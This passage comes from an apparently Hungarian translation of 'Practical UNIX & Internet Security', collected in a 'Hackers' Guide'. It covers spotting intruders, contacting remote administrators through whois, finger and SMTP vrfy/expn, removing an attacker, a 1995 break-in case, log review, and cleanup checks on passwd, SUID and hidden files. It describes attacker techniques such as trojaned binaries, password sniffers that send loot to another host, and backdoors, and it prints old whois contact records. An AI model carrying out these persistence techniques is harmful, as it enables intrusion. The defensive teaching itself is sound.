parancsot,amelyik a gépedre irányul.Ha találsz ilyet,azonnal lépj kapcsolatba az<br />
adott rendszer adminisztrátorával,és figyelmeztesd a problémával kapcsolatban.<br />
Egyéb figyelmeztõ jelek<br />
Számos egyéb figyelmeztetõ jel létezik,amely egy támadó jelenlétére utalhat a<br />
rendszerünkben.Pl felfedezed,hogy azok a shellek olyan terminálokon<br />
futnak,amelyekre senki sincs belépve vagy olyan nyitott network connection-öket<br />
veszel észre,melyek eredete ismeretlen gépekrõl ered.<br />
Légy gyanakvó és kiváncsiskodó!<br />
Hogyan lépjünk kapcsolatba olyan computerek adminisztrátoraival,amelyeket nem<br />
ismerünk<br />
Gyakran elõfordulhat,hogy nem tudod kideríteni a nevét és telefonszámát egy távoli<br />
gép rendszeradminisztrátorának,mert a UNIX nem biztosít elõírásszerû<br />
felhasználóazonosítási mechanizmust.Jó módszer a telefonszám és email cím<br />
kiderítésére a whois parancs használata,amivel a NIC (Network Information Center)<br />
adatbázisban kerestethetünk.Ha a rendszereden nincs whois parancs,egyszerûen<br />
telnetelj be a NIC site-ra.Alul van egy példa arra,hogyan nyomozzuk ki a nevet és<br />
telefonszámot.<br />
A NIC karabantart egy adatbázist,amely a fontos network felhasználók neveit,címeit<br />
és telefonszámait tartalmazza(álltalában a különbözõ site-ok contact person-jainak<br />
adatait is).Ha connectolni tudsz a whois.internic.net-re telneten<br />
keresztül,megkaphatod az információt,amire szükséged van.Próbáld ki a következõt :<br />
1. Telnetelj a whois.internic.net-re<br />
2. A promptnál írd be : whois<br />
3. Próbáld meg beírni a robot.ocp.com hostot. Ha szerencséd van,a server a<br />
megfelelõ recordot küldi vissza az adatbázisból,amely a contact person adatait<br />
tartalmazza.<br />
4. Ha ez nem jött be,próbálkozz az ocp.com-mal.<br />
5. Ha kész,írd be a quit-et a rendszerbõl való kilépéshez.<br />
A következõ példa azt mutatja be,hogy hogyan kapjunk információt a whitehouse.gov<br />
domainról:<br />
% telnet whois.internic.net<br />
Trying 198.41.0.6 ...<br />
Connected to rs.internic.net.<br />
Escape character is `^]'.<br />
144<br />
SunOS UNIX 4.1 (rs1) (ttyp1)
Hackers’ Guide<br />
***********************************************************************<br />
* -- InterNIC Registration Services Center --<br />
*<br />
* For wais, type: WAIS <br />
* For the *original* whois type: WHOIS [search string] <br />
* For referral whois type: RWHOIS [search string] <br />
*<br />
* For user assistance call (703) 742-4777<br />
# Questions/Updates on the whois database to HOSTMASTER@internic.net<br />
* Please report system problems to ACTION@internic.net<br />
***********************************************************************<br />
Please be advised that use constitutes consent to monitoring<br />
(Elec Comm Priv Act, 18 USC 2701-2711)<br />
Cmdinter Ver 1.3 Tue Oct 17 21:51:53 1995 EST<br />
[xterm] InterNIC > whois<br />
Connecting to the rs Database . . . . . .<br />
Connected to the rs Database<br />
Whois: whitehouse.gov<br />
Executive Office of the President USA (WHITEHOUSE-HST)<br />
WHITEHOUSE.GOV<br />
198.137.240.100<br />
Whitehouse Public Access (WHITEHOUSE-DOM)<br />
WHITEHOUSE.GOV<br />
Whois: whitehouse-dom<br />
Whitehouse Public Access (WHITEHOUSE-DOM)<br />
Executive Office of the President USA<br />
Office of Administration<br />
Room NEOB 4208<br />
725 17th Street NW<br />
Washington, D.C. 20503<br />
Domain Name: WHITEHOUSE.GOV<br />
Administrative Contact:<br />
Fox, Jack S. (JSF) fox_j@EOP.GOV<br />
(202) 395-7323<br />
Technical Contact, Zone Contact:<br />
Ranum, Marcus J. (MJR) mjr@BSDI.COM<br />
(410) 889-6449<br />
Record last updated on 17-Oct-94.<br />
Record created on 17-Oct-94.<br />
Domain servers in listed order:<br />
GATEKEEPER.EOP.GOV 198.137.241.3<br />
ICM1.ICP.NET 192.94.207.66<br />
145
Hackers’ Guide<br />
Whois: quit<br />
[xterm] InterNIC > quit<br />
Tue Oct 17 21:55:30 1995 EST<br />
Connection closed by foreign host.<br />
%<br />
Ha esetleg ez a módszer nem sikerülne,meg kel próbálni a host ISP-jét felhívni,hátha<br />
tudnak contact onformációt mondani.Az ISP-t könnyen kideríthetjük a traceroute<br />
paranccsal.Vészhelyzetben a szervezet számát hívjuk(amihez a site tartozik),és<br />
kérjük meg a biztonsági õrt,hogy lépjen kapcsolatba a megfelelõ személyekkel.<br />
Megpróbálhatjuk esetleg még a finger parancsot alkalmazni a távoli gép rootjára :<br />
% finger root@robot.ocp.com<br />
[robot.ocp.com]<br />
Login name: root in real life: Joel Wentworth<br />
Directory: / Shell: /bin/csh<br />
Last login Sat April 14, 1990 on /dev/tty<br />
Plan:<br />
For information regarding this computer, please contact<br />
Joel Wentworth at 301-555-1212<br />
Sajnos elég gyakran használhatatlan információt ad vissza :<br />
% finger root@robot.ocp.com<br />
[robot.ocp.com]<br />
Login name: root in real life: Operator<br />
Directory: / Shell: /bin/csh<br />
Last login Mon Dec. 3, 1990 on /dev/console<br />
No plan<br />
Ebben az esetben meg kell próbálnod kinyomozni,hogy ki a computer<br />
adminisztrátora,úgy,hogy kapcsolatba lépünk a site sendmail démonjával,és<br />
megpróbáljuk azonosítani,hogy ki kap leveleket a root vagy postmaster mailboxokba.<br />
% telnet robot.ocp.com smtp<br />
Trying...<br />
Connected to robot.ocp.com<br />
Escape character is "^]".<br />
220 robot.ocp.com Sendmail NeXT-1.0 (From Sendmail 5.52)/NeXT-1.0 ready at<br />
Sun, 2 Dec 90 14:34:08 EST<br />
helo mymachine.my.domain.com<br />
250 robot.ocp.com Hello mymachine.my.domain.com, pleased to meet you<br />
vrfy postmaster<br />
250 Joel Wentworth <br />
expn root<br />
250 Joel Wentworth <br />
quit<br />
221 robot.ocp.com closing connection<br />
Connection closed by foreign host.<br />
146
Ezekután használhatod finger parancsot,hogy kiderítsd a telefonszámot.<br />
Hackers’ Guide<br />
Sajnos sok rendszeradminisztrátor kikapcsolja a finger démont,és a sendmail démon<br />
nem teljesíti a kérésünket(verify,expand).Ugyanakkor még mindig van esély a<br />
contact person azonosítására.<br />
Ha minden próbálkozásunk sikertelen,küldhetünk mailt a "postmaster" -nek az adoot<br />
gépre,és reménykedhetünk,hogy hamarosan elolvassák....Soha ne említsd meg a<br />
betörést az emailben,mert néha a betolakodó monitorozza az emaileket.Ehelyett add<br />
meg a nevedet,telefonszámodat,jelezd,hogy a dolog nagyon fontos,és kérd a<br />
postmastert,hogy hívjon fel.Természetesen,miután felhívtak,azonnal tudd meg a<br />
számot,és próbáld meg visszahívni õket - csak hogy biztos legyél benne,hogy az<br />
adminisztrátorral beszélsz(és nem a támadóval,aki törölte a levelünket,mielõtt azt<br />
bárki elolvashatta volna).Felveheted a kapcsolatot a FIRST team-ek egyikével<br />
is,úgymint a CERT-CC-vel.Nekik van néhány egyéb erõforrásuk,és talán õk el tudnak<br />
látni a kellõ contact infokkal.<br />
Hogyan szabaduljunk meg a behatolótól?<br />
A számítógép kikapcsolása a leggyorsabb mód arra,hogy a támadót kirugdaljuk a<br />
géprõl. :) Szerencsétlenségünkre ez a drasztikus akció nem csak a támadót rugdalja<br />
ki a géprõl,hanem félbeszakítja a gépünkben folyó összes folyamatot,beleértve a<br />
felhasználók munkáit is.Ezzel a bizonyítékot is könnyen eltüntethetjük,amelyre<br />
néhány nap múlva a bíróságon nagy szükségünk lehet(pl : futó<br />
processek(mailrace,stb)),valamint ez okozhatja a rendszer sérülését is amikor<br />
rebootolsz (a trojan startup-scriptek miatt).A UNIX filerendszere nincs<br />
megbarátkozva a hirtelen áramellátás megszûnéssel : a tápcsatlakozó kihúzása jóval<br />
nagyobb károkat okozhat,mint amilyet a behatoló valaha is tehet.<br />
Néhány esetben sikerülhet a támadótól való megszabadulás úgy is,ha egyszerûen<br />
megkérjük,hogy hagyja el a rendszerünket.Informáld a támadót,hogy amit csinál az<br />
antiszociális és törvényellenes.Néhány számítógépes betörõnek gyerekes motivációi<br />
vannak a magántulajdon megsértésére;gyakran nem állnak le gondolkodni a<br />
következménykerõl.Ugyanakkor ne fogadj rá,hogy a behatoló primitív azért,mert így<br />
viselkedik.<br />
Ha az illetõ nem hajlandó elhagyni rendszerünket,ki kell gyilkolni az álltala futtatott<br />
processeket a kill parancsot használva. Használd a ps parancsot,hogy megkapd az<br />
összes user processeinek process-számát,változtasd meg a hackelt acc. jelszavát,és<br />
végül irtsd ki a támadó összes processét.<br />
Egy egyszerû példa:<br />
# ps -aux<br />
USER PID %CPU %MEM VSIZE RSIZE TT STAT TIME COMMAND<br />
root 1434 20.1 1.4 968K 224K 01 R 0:00 ps aux<br />
nasty 147 1.1 1.9 1.02M 304K p3 S 0:07 - (csh)<br />
nasty 321 10.0 8.7 104K 104K p3 S 0:09 cat /etc/passwd<br />
nasty 339 8.0 3.7 2.05M 456K p3 S 0:09 rogue<br />
...<br />
# passwd nasty<br />
Changing password for nasty.<br />
147
Hackers’ Guide<br />
New password: rogue32<br />
Retype new password: rogue32<br />
# kill -9 147 321 339<br />
Légy megfontolt a password változtatásnál,mielõtt kinyírod a processeket -<br />
különösen ha a behatoló rootként van belépve.Ha a felhasználó gyorsabban<br />
gépel,mint te,könnyen elõfordulhat hogy letiltja az accodat,mielõtt tudnál róla. :)<br />
Tartsd észben,hogy a legtöbb betolakodó installálni fog egy backdoort a<br />
rendszerbe.Szóval attól,hogy megváltoztattad a jelszót,még nem biztos,hogy<br />
biztonságban vagy : kapcsold a rendszert single-user módba,és ellenõrizd le<br />
többször is.<br />
Ha már minden kötél szakad,fizikailag is megszakíthatod a kapcsolatot.Ha a<br />
behatoló telefonvonalon tárcsázott be,kikapcsolhatod a modemet - vagy kihúzhatod a<br />
számítógép hátuljából. Ha a behatoló networkön keresztül jött be,kihúzhatod a<br />
hálózati csatlakozót - ugyanakkor ez minden legitim felhasználó kiszolgálását<br />
megszakítja.. Amint a támadó eltûnt a gépünkrõl,próbáld meg eldönteni a kár<br />
volumenét,és foltozd be a sechole-okat,amik a behatolót beengedték.Ugyanakkor<br />
alaposan nézzünk szét,mert könnyen lehet,hogy új sechole-okat nyitott meg,amin<br />
késõbb visszajöhet.<br />
Egy betörés anatómiája<br />
A következõ történet megtörtént esetet dolgoz fel.A nevek és egy pár részlet meg lett<br />
változtatva a személyiségi jogok védelme érdekében. :))<br />
Késõ este 1995 Novemberében egy computer konzultáns egy Seattle-i cégnél<br />
belépett az egyik gépbe,amelyet alkalmanként használni szokott.A rendszer<br />
szokatlanul lassúnak tûnt,így lefuttatta a top parancsot,hogy megtudja,mi az,ami<br />
ennyire lelassítja a rendszert.A konzultáns észrevette,hogy egy vs nevû program<br />
óriási rendszer-erõforrásokat emészt fel.A program superuserként futott...<br />
Valami nem stimmelt...Hogy több információt kapjon,lefuttatta a ps parancsot.Ekkor<br />
egyre furcsábbak lettek a dolgok - a misztikus program nem jelent meg a ps álltal<br />
visszaadott listában.Mégegyszer megpróbálta a top parancsot futtatni,és lám a vs<br />
process még mindig futott...<br />
Ekkor villant be a tudatába,hogy ezek egy betörés nyomai lehetnek...Elkezdett hát a<br />
filerendszerben körbenézni az Emacs dired parancsát használva,és megtalálta a vs<br />
programot a /var/.e könyvtárban.Semmi kétség,a program pontosan itt volt,és még<br />
mindig látható volt Emacsból a dired paranccsal.<br />
Ekkor már biztos volt benne,hogy valaki betört a rendszerbe.A támadás elég<br />
kifinomúltnak tünt.Természetesen nem akarta,hogy a támadó tovább<br />
tevékenykedhessen,ezért szerette volna shutdownolni a rendszert.De aggódott<br />
amiatt,hogy a támadó booby-trappolta(??) a /etc/halt parancsot,hogy megsemmisítse<br />
a betörés nyomait. Ezért mielõtt lelõtte volna a rendszert,használta a tar<br />
parancsot,hogy másolatot készítsen a /var/.e könyvtárról éppúgy,mint a /bin és /etc<br />
könyvtárakról.Amint a .tar file elkészült,átmásolta azt egy másik computerre,majd<br />
megállította a rendszert.<br />
Másnap reggel a következõ megfigyeléseket tette a .tar fileban:<br />
148
- Valaki betört a rendszerbe<br />
Hackers’ Guide<br />
- A /bin/login program módosítva lett,így bárki be tud lépni rootként az Internetrõl,egy<br />
spéci password birtokában.<br />
- A /var/.e/vs program amit a támadó futtatott,egy sniffer volt,ami passwordokre<br />
vadászott.Ez az elfogott passwordoket egy másik gépre küldte át az interneten<br />
keresztül<br />
- A /bin/ls és /bin/ps programok stzintén módosítva lettek,így azok nem jelenítették<br />
meg a /var/.e directoryt<br />
- Az inode kreációs dátum és a módosítási idõk a /bin/ls,/bin/ps és /bin/login file-okon<br />
vissza lettek állítva az eredeti értékekre(a módosítás elõttire).A módosított file-ok<br />
chechksumja pedig megegyeztek az eredetivel.De a file-ok összehasonlítása a<br />
bckupban tároltakkal megmutatja,hogy változtatás történt rajtuk.<br />
Este 10:00 volt,amikor a betörést felfedezte.Ennek ellenére felhívta telefonon a<br />
system managert az otthonában.Ekkor rá kellet jönnie....<br />
- A system manager tudott a betörésrõl 3 napja,de semmit sem tett az ügy<br />
érdekében.Az ok az volt,hogy félt,hogy a behatoló sok biztonsági rést csinált<br />
rendszerének védelmében,és ha felidegesíti õt,az illetõ bosszút állhat és letörölhet<br />
fontos file-okat,vagy teljesen lelõheti a rendszert. :))<br />
[Ez aztán a system manager,mi? :)]<br />
Ez egy nagyon hülye lépés volt.Hagyni a támadót,hogy a rendszeren maradva minél<br />
több passwordot gyüjthessen....Bahhh! A késleltetéssel hagyjuk,hogy az idõ a<br />
támadónak dolgozzon,és egyre nagyobb módosításokat eszközöljön a rendszeren.<br />
Mit tehetett volna a manager,amint felfedezi a betörést? Nos...nagyjából az,amit a<br />
konzultáns barátunk tett...Csinálni egy archive-ot a rendszerrõl szalagra,vagy egy<br />
másik diskre,izolálni a rendszert,és csak ezután nyomozni.Ha a rendszer boobytrappolva<br />
lett,és egy áramellátás-hiba keletkezik,abszolút mindent elveszthetnek.<br />
A fenti eset egy tipikus példa az 1994-1995-ben történt betörésekre.A támadonak<br />
elérése van sok eszközhöz,amikkel a betörést végre lehet hajtani(password<br />
snifferek,fake system commandok,amelyek elrejtik jelenlétét).Ezen eszközök<br />
használóinak nagy része azt sem tudja hogyan mûködnek.Sok történetet<br />
hallani,hogy egy lamernek sikerül betörni egy gépbe egy ilyen eszközzel,aztán a<br />
UNIX-os rendszeren DOS-parancsokat akarnak kiadni...Röhejes!<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Fordította : Th3NmY<br />
************************************************************************************************<br />
149
Hackers’ Guide<br />
Betörések felfedezése és kezelése III.<br />
A Log Fileok : A behatoló álltal hagyott nyomok felfedése<br />
Ha nem sikerül a behatolót elkapnod aktivítás közben,még mindig jó esélyed van a<br />
nyomok megtalálására a system logokon keresztül. Elékezz! Keress szokatlan,furcsa<br />
tevékenységeket.pl :<br />
- Userek furcsa idõpontban belépve<br />
- Megmagyarázhatatlan rebootok.<br />
- Megmagyarázhatatlan változtatások a system clock-on.<br />
- Szokatlan hibaüzenetek a mailertõl,ftpd-tõl,vagy más network servertõl.<br />
- Hibás belépési próbálkozások rossz jelszavakkal<br />
- A su parancs jogosulatlan vagy gyanús használata<br />
- Felhasználók,amelyek ismeretlen siteokról vannak loginolva a hálózaton.<br />
Másfelõl nézve azonban ha a behatoló elég ügyes és eléri a superuseri<br />
jogosultságokat,eltûntetheti az invázió összes bizonyítékát.Egyszerûen azért,mert ha<br />
a rendszered logjában nincs record a támadás nyomairól,nem fogsz tudni<br />
rájönni,hogy a rendszered támadás alatt áll.<br />
Sok támadó kis trükköket használ : ahelyett,hogy óvatosan kiszedegetné a rá utaló<br />
recordokat a logokból,egyszerûen törli,vagy meghamisítja az egész filet.Ez azt<br />
jelenti,hogy ha felfedezed,hogy egy logfile törölve van,vagy hamis információt<br />
tartalmaz,fennáll a lehetõség,hogy betörtek a rendszerünkre.De nem biztos,hogy egy<br />
betörés a felelõs a furcsaságokért.Hiányzó,vagy hamis logok azt is jelenthetik,hogy a<br />
system adminisztrátorok egyike óvatlan volt;lehetnek olyan programok a<br />
rendszeren,amelyek törlik a logokat rendszeres idõközönként.<br />
Arról is felismerhetünk egy támadást,ha jogosulatlan változtatásokat találunk<br />
rendszerprogramokban,vagy egy user file-jaiban.Ez egy másik jó ok,hogy olyan<br />
programokat használj,mint a Tripwire a fileokban történõ változások monitorozására.<br />
Ha a system logok egy hardcopy terminal-ra,vagy másik gépre vannak<br />
irányítva,biztosan szeretnéd elõször ezeket megvizsgálni,mert tudod,hogy ezeket<br />
nem tudta a támadó módosítani,aki telefonvonalon,vagy networkon keresztül loginolt.<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Fordította : Th3NmY<br />
************************************************************************************************<br />
150
Betörések felfedezése és kezelése IV.<br />
A behatoló utáni takarítás<br />
Hackers’ Guide<br />
Ha a támadónak sikerült megszereznie a superuseri jogokat,vagy elérést más<br />
privilegizált accountokhoz úgymint uucp,módosíthatja a rendszert,hogy könnyû<br />
legyen újra visszajönnie a jövõben.Részletesebben,a támadó :<br />
- Készíthet egy új accountot<br />
- Megváltoztatja a jelszót egy létezõ accounthoz<br />
- Megváltoztatja a védelmeket egyes file-okon vagy device-okon<br />
- SUID vagy SGID programokat csinálhat<br />
- Kicserélheti,vagy letörölheti a system parancsokat<br />
- Installál egy spéci aliast a mail rendszerben hogy egy programot futtasson<br />
- Új arculatot ad a news vagy UUCP rendszerhez<br />
- Installál egy password sniffert<br />
- Ellopja a password file-t a késõbbi crack-hez<br />
Ha a behatoló az urolsó két bûntettet elkövette,valószínüleg már van elérése egy<br />
legitim accounthoz,bármikor visszatérhet a rendszerbe.Meg kell változtatnod az<br />
összes passwordot a rendszeren.<br />
Egy sikeres betörés után,egy nagyon körültekintõ auditot kell végrehajtanod,hogy<br />
felmérd az okozott kár volumenét.A betörés természetétõl függõen,meg kell<br />
vizsgálnod az egész rendszert.Ugyanígy meg kell vizsgálnod más gépeket is a local<br />
networkodon,vagy talán az egész networkot(beleértve a routereket,és más hálózati<br />
eszközöket).<br />
Megjegyezném,hogy a COPS és a Tiger nagy segítséget nyújtanak a helyreállítási<br />
munkálatokban mivel automatikusan leellenõrzik azokat a dolgokat amiket ebben a<br />
fejezetben tárgyalunk majd.Emlékezz,lehet,hogy ezek is kompromittálva lettek,ezért<br />
szerezz egy új másolatot,és arról dolgozz.A COPS és a Tiger feltételezi a systemexecutable<br />
-ek integrítását,úgymint ls és find.Mi úgy gondoljuk ,ezek az eszközök<br />
jobban használhatók adott esetekben integritás checkerekkel,mint a Tripwire.<br />
A fejezet hátralévõ része részletesen tárgyalja,hogyan találjuk meg,hogy egy támadó<br />
mit csinálhatott,és hogyan fogod mindezt rendbehozni.<br />
Új accountok<br />
Egy behatolás után,scanneld a /etc/passwd file-t,nézd meg,vannak-e benne új<br />
accok.Ha csináltál másolatot errõl a fileról,használd a diff parancsot,hogy a két file-t<br />
összehasonlítsd.De ne tévesszen meg,ha semmilyen különbséget nem<br />
151
Hackers’ Guide<br />
találsz...vizuáld le saját magad is,mert lehet,hogy a támadó módosította a diff<br />
programot...ha így sem találtál semmit,az sem jelent semmit....lehet,hogy a betörõ a<br />
másolatot is módosította. (Ez egy jó ok arra,hogy mindig tartsunk egy külön floppyn<br />
másolatot a /etc/passwd file-ról)<br />
Törölj minden accot,amit a betörõ hozott létre.Jó ha leírod papírra az acc-recordot<br />
mielõtt letörölnéd,abban az esetben ha szeretnéd beperelni a támadót.<br />
Légy biztos benne,hogy a /etc/passwd minden sorát leellenõrizted a megfelelõ<br />
formátumban,és nem volt UID vagy password mezõ,ami jogosulatlan értékekre lett<br />
megváltoztatva.Emlékezz,hogy egy extra kettõspont (:) hozzáadása a /etc/passwd<br />
root bejegyzéshez ugyanazt a kárt okozza,mintha a superuser egész passwordját<br />
törölnék!<br />
A következõ awk parancs kiírja azokat a /etc/passwd bejegyzéseket,amelyeknek<br />
nincs meg a hét mezõjük,amely a superusert specifikálja,vagy nincs passwordjuk.<br />
# cat-passwd | awk -F: 'NF != 7 || $3 == 0 || $2 == "" { print $1 " " $2 " " $3}'<br />
root xq7Xm0Tv 0<br />
johnson f3V6Wv/u 0<br />
sidney 104<br />
#<br />
Ez az awk parancs beállítja a mezõ szeparátort kettõspontra (:), amelyik megegyezik<br />
a /etc/passwd formátumával.Az awk parancs ekkor kiírja az elsõ 3 mezõt(username,<br />
password, és UID) minden sorból,aminek nincs meg a 7 mezõje,vagy 0 az UID,or<br />
nincs passwordje.<br />
Ebben a példában a Johnson usernek 0-ra lett változtatva volt a UID-je,ezzel az<br />
accountja superuseri alias lett,és a Sidney nevû usernek a passwordja el lett<br />
távolítva.<br />
Ez az automatizált checkelés sokkal megbízhatóbb,mint a vizuális<br />
szemrevételezés,de bizonyosodj meg róla,hogy az a script,amit a checkeléshez<br />
használsz,nem lett-e módosítva a betörõ álltal.A legbiztosabb,ha az awk parancsot<br />
minden esetben begépeljük,és nem egy scriptben helyezzük el....vagy használd a<br />
Tripwire-t.<br />
A fileok tartalmának változása<br />
Egy behatoló,aki megszerezte a superuseri jogokat,bármilyen file-t megváltoztathat a<br />
rendszeren.Csinálhatsz egy átfogó leltárat a rendszer filerendszerérõl,vagy<br />
specifikusan kereshetsz bármilyen változtatást.Például egy intruder elhelyezhetett<br />
egy trap-doort,vagy logical bomb-ot,hogy azok késõbb károkat tudjanak okozni.<br />
Az egyik módszer,hogy könnyen észrevegyük a system programokban történt<br />
változtatásokat,hogy checklistákat használunk.<br />
Változtatások a file vagy directory védelmekben<br />
Egy betörés után meg kell vizsgálnunk a védelmét minden kritikus file-nak a<br />
rendszeren.Azok a behatolók,akik superuseri privilégiumokat szereztek<br />
megváltoztathatják a kritikus file-ok védelmét,könnyebbé téve ezzel a superuseri<br />
jogok újbóli megszerzését.Például ha egy intruder a /bin könyvtár mode-ját 777-re<br />
152
Hackers’ Guide<br />
változtatta meg,a jövõben könnyebb lesz módosítania a rendszert; vagy a /dev/kmem<br />
mode-ját átírva megteheti,hogy módosítja a system call-okat közvetlenül egy<br />
symbolic debuggert használva.<br />
Új SUID és SGID fileok<br />
Computer crackerek ,akik superuser jogokra tettek szert,gyakran készítenek SUID és<br />
SGID file-okat.Egy betörés után scanneld a rendszeredet,hogy megbizonyosodj<br />
afelõl, hogy nem keletkeztek új SUID file-ok.<br />
Változások a .rhosts fileban<br />
Egy támadó új .rhosts file-t gyárthatott a userek home directoryjában,vagy<br />
módosíthatta a már meglévõket. (A .rhosts file megengedi a többi usernek a<br />
hálón,hogy logineljenek az accountodra anélkül,hogy passwordot kérne).Egy betörés<br />
után mondd meg a usereknek, hogy checkeljék a .rhost file-jaikat,hogy<br />
megbizonyosodj arról,hogy egyikük sem lett módosítva.<br />
Változások a /etc/hosts.equiv fileban<br />
Egy betolakodó hozzáadhat extra hostokat a /etc/hosts.equiv filehoz,szóval<br />
bizonyosodj meg róla,hogy nem történtek változtatások benne.Ugyanakkor checkeld<br />
a /etc/netgroups file-t is,ha NIS-t vagy NFS-t futtatsz.<br />
Változások a startup fileokban<br />
Egy támadó módosíthatja a tartalmát a pont-tal (.) kezdõdõ fileoknak a userek home<br />
directoryjában.Utasítsd az összes usert,hogy ellenõrizzék ezeket a fileokat,és<br />
jellezzek minden változást.Azt is mondhatod még nekik,hogy úgy checkoljanak,hogy<br />
elõször nevezzék át õket login.old,cshrc.old illetve profile.old-ra. Vedd komolyan<br />
azoknak a fileoknak a verziószám-ellenõrzését,amelyeknek az ownere root,és<br />
ugyanígy checkeld a /etc/profile filet.<br />
Ha sendmailt használsz, a támadó kreálhatott vagy módosíthatta a .forward filet,így<br />
tudnak programokat futtatni,amikor egy mail érkezik.Ez a külsõség különösen kritikus<br />
a nonuser accountoknál,pl ftp vagy uucp.<br />
Ha tudod a támadó belépésének pontos idõpontját,ki tudod listázni az összes .-tal<br />
kezdõdõ filet a userek home directoryjában,rendezheted õket az utolsó változtatások<br />
idõpontja szerint,és ellenõrizheted õket,hogy lettek-e módosítva. Egy egyszerû shell<br />
script erre :<br />
#!/bin/ksh<br />
# Search for .files in home directories<br />
for user in $(cat-passwd | /bin/awk -F: "length($6) > 0 {print $6}")<br />
do<br />
for name in $user/.*<br />
do<br />
[[ $name == $user/.. ]] && continue<br />
[[ -f $name ]] && print "$name"<br />
done<br />
done | xargs ls -ltd<br />
153
Hackers’ Guide<br />
Ugyanakkor a timestampek vizsgálata nem detektál minden módosítást,ahogy azt<br />
majd a fejezet végére létni fogjuk.A -c és -l opciók az ls parancshoz használhatók<br />
arra,hogy az esetleges permission beállításokban történt változásokat is checkolni<br />
tudjuk,és meg tudjuk határozni,hogy az mtime-ot megváltoztatták-e,hogy elrejtsék a<br />
módosítást.<br />
Egy másik megközelítés,hogy az egész filerendszert átnézzük a find paranccsal és<br />
észleljük,milyen fileok és könyvtárak lettek elérve a betörés ideje környékén. Ez talán<br />
kiindulópontot jelenthet ahhoz,hogy mi is történhetett. Abban az esetben,ha a<br />
compilered,loadered, vagy libraryd mindegyike elérést mutat közel ugyanabban az<br />
idõpontban,levonhatod a konklúziót,hogy a betolakodó valamit fordított.<br />
Ha úgy döntessz,hogy így közelíted meg a dolgot, azt tanácsoljuk,hogy elõször<br />
mountold újra az egész filerendszert,mint read-only,így a vizsgálódásaid nem<br />
változtatják meg a mentett filerendszer dátumait és idejét.<br />
Rejtett file-ok és direcoryk<br />
A támadó csinálhatott egy vagy több rejtett directoryt a rendszeren,és használhatta<br />
ezt arra,hogy ide rejtse el az ellopott információt vagy az olyan programokat,amelyek<br />
megtörik a védelmet.<br />
Régebbi UNIX rendszereken, egy álltalános trükk volt a directory elrejtésére,hogy<br />
unlinkelték (rootként) a ".." directoryt egy alkönyvtárban, majd egy újat hoztak létre. A<br />
find parancs figyelmét az így elrejtett directoryk elkerülték,így ott nem tudott speciális<br />
file-ok után kutatni. A UNIXok modern verziói már detektálni tudják a hidden<br />
directorykat,amikor a /etc/fsck programot futtatjuk. Ezért mindig futtasd az fsck-t az<br />
összes filerendszeren a betörés után.<br />
Néhány HP-UX rendszeren a betolakodók az eszközeiket és file-jaikat egy<br />
CDF(Context Dependent File) directoryban tárolták. Ezeken a rendszereken a find és<br />
ls parancsoknál mindig használd a -h opciót,amikor a speciális file-okat keresed.<br />
Napjainkban,a betolakodók gyakran rejtik a filejaikat olyan directorykba,amelyeknek<br />
nevét nehéz felfedezni,vagy nehéz a command line-ba írni. Így egy kezdõ<br />
adminisztrátornak, aki felfedez egy rejtett directoryt, nyilvánvalóan nehezére esik<br />
majd a könyvtár tartalmához való hozzáférés. Az olyen filenevek, amelyeket nehéz<br />
felfedezni vagy megnyitni,álltalában tartalmazzák a ".. " (dot dot space)<br />
karaktersorozatot, kontroll karaketereket,backspace-eket,vagy más speciális<br />
karaktereket.<br />
Gyakran felfedezhetsz hidden diractorykat könnyen, mert ezek olyan eredményeket<br />
adnak vissza,amelyek különböznek a normál könyvtáraktól.<br />
Például :<br />
prose% ls -l<br />
drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar<br />
prose% cd foobar<br />
foobar: No such file or directory<br />
prose%<br />
Ebben az esetben a könyvtár valódi neve foobar , az r betût pedig egy space<br />
követi.A könnyû út az ilyen és ehhez hasonló nevek megnyitásához,hogy használjuk<br />
154
a shell wildcard karaktereit. Pl a *ob* csak a foobar könyvtárral fog egyezni,és<br />
teljesen mindegy,hogy hány space,illetve egyéb dolog volt a végén.<br />
% ls -l<br />
total 1<br />
-rw-r--r-- 1 john 21 Mar 10 23:38 bogus?file<br />
% echo * | cat -v<br />
bogus^Yfile<br />
%<br />
Hackers’ Guide<br />
Ebben a példában a bogus?file egy CTRL+Y karaktert tartalmaz.Az ls parancs<br />
néhány verziója a controll karaktereket kérdõjelekként(?) írja ki. Ahhoz,hogy<br />
megtudjuk,mi volt a kontroll karakter,a nyers filenevet kell a cat parancsnak<br />
küldened.<br />
Ha a Korn shell 93-as verzióját használod,akkor kilistáztathatod egy adott local<br />
directory filejait egy olvashatóbb formában.Ez a megközelítés használható abban az<br />
esetben,ha az ls parancsodat kompromittálta a támadó :<br />
$ printf $'entry: %'' .* *<br />
entry: .<br />
entry: ..<br />
entry: $'..\n'<br />
entry: $'bogus\031file'<br />
entry: temp0001 entry: temp0002 $<br />
Tulajdonos nélküli file-ok<br />
Néha a támadók olyan file-okat hagynak a filerendszerben,amelyeknek nincs<br />
ownerja,illetve groupja.Ez azért van,mert a file-hoz tartozó UID, illetve GID érték nem<br />
felel meg egyetlen bejegyzésnek sem a /etc/passwd illetve a /etc/group fileban. Ez<br />
olyankor fordulhat elõ,ha a támadó csinált egy accountot és néhány file-t,majd törölte<br />
az accot - és ott hagyta a file-okat.<br />
Vagy esetleg a támadó módosította a raw inode-okat egy lemezenmés<br />
megváltoztatta az UID-et.<br />
Ezekre a file-okra rákereshetsz a find paranccsal, ahogy a következõ példa is<br />
mutatja :<br />
# find / -nouser -o -nogroup -print<br />
Emlékezz,ha NFS-t használsz, futtathatod a következõ find parancsot az összes<br />
serverre :<br />
# find / \( -local -o -prune \) -nouser -o -nogroup -print<br />
Akkor is lehetnek owner nélküli fileok a rendszeren,ha egy accot töröltél,de a hozzá<br />
tartozó file-okat nem.Egy jó ötlet,hogy idõnként scanneljünk az ilyen file-ok után,ha<br />
találunk,mentsük õket szalagra,hátha késõbb még szükségünk lesz rá.<br />
Eredeti mû : Practical UNIX & Internet Security<br />
Fordította : Th3NmY<br />
155
Hackers’ Guide<br />
************************************************************************************************<br />
Betörések felfedezése és kezelése V.<br />
Egy példa<br />
Tegyük fel,hogy te egy system administrator vagy egy rendszeren és John Q.<br />
Random ott van veled az irodában. Hirtelen egy figyelmeztetõ ablak nyílik a<br />
képernyõn,amelyet egy Swatch rule syslog kimenet-monitorozó progi nyitott.A syslog<br />
üzenet azt mutatja,hogy John Q. Random loginelt,használta az su parancsot,és root<br />
lett.<br />
